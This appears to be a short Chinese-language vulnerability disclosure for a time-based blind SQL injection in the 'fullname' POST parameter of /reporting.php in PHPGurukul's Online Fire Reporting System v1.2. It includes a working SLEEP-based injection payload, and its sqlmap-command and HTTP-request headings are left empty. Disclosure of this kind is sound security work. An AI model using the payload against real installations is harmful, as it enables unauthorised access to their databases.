关键信息 漏洞描述 漏洞类型: SQL注入 (SQLi) 受影响系统: Online Fire Reporting System v1.2 文件: /reporting.php 供应商信息 供应商: PHPGurukul 项目: Online Fire Reporting System 漏洞细节 版本: V1.2 易受攻击的文件: /reporting.php POC (概念验证) sqlmap命令: HTTP请求示例: 注入点: - 参数: fullname (POST) - 类型: 时间盲注 (time-based blind) - 标题: MySQL >= 5.0.12 AND time-based blind (query SLEEP) - 负载: fullname=1' AND (SELECT 4364 FROM (SELECT(SLEEP(5)))JHEp) AND 'uDFv'='uDFv&mobilenumber=1&location=1&message=1&submit=%E6%9F%9C%E4%BA%A4%E6%9F%A5%E8%AF%A2 ```